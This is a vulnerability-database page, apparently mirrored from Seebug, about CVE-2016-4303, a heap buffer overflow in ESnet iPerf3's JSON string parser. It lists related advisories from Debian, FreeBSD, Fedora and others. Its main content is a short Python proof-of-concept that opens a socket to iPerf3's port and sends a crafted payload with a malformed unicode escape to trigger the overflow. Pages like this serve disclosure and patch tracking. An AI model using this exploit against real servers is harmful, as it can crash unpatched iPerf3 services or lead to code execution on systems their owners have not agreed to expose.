Lucene search
K

ESnet iPerf3 JSON parse_string UTF Code Execution Vulnerability(CVE-2016-4303)

🗓️ 20 Oct 2017 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 78 Views

ESnet iPerf3 JSON parse_string UTF Code Exec Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2016-4303
26 Sep 201614:59
attackerkb
CNVD
ESnet iPerf3 Heap Buffer Overflow Vulnerability
24 Jun 201600:00
cnvd
CVE
CVE-2016-4303
26 Sep 201614:00
cve
Cvelist
CVE-2016-4303
26 Sep 201614:00
cvelist
FreeBSD
iperf3 -- buffer overflow
8 Jun 201600:00
freebsd
Debian
[SECURITY] [DLA 2080-1] iperf3 security update
27 Jan 202021:51
debian
Debian CVE
CVE-2016-4303
26 Sep 201614:00
debiancve
Tenable Nessus
Debian DLA-2080-1 : iperf3 security update
28 Jan 202000:00
nessus
Tenable Nessus
Fedora 22 : iperf3 (2016-45402a6f3b)
14 Jul 201600:00
nessus
Tenable Nessus
Fedora 23 : iperf3 (2016-9693e82a25)
14 Jul 201600:00
nessus
Rows per page

                                                #!/usr/bin/env python2
import socket

TCP_IP = '127.0.0.1'
TCP_PORT = 5201
MESSAGE='AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x00\x00\x00\x00A\x31"\uC":"DEEEEEEEEFFFFFFFFGGGGGGGG}'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
s.send(MESSAGE)
s.close()
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation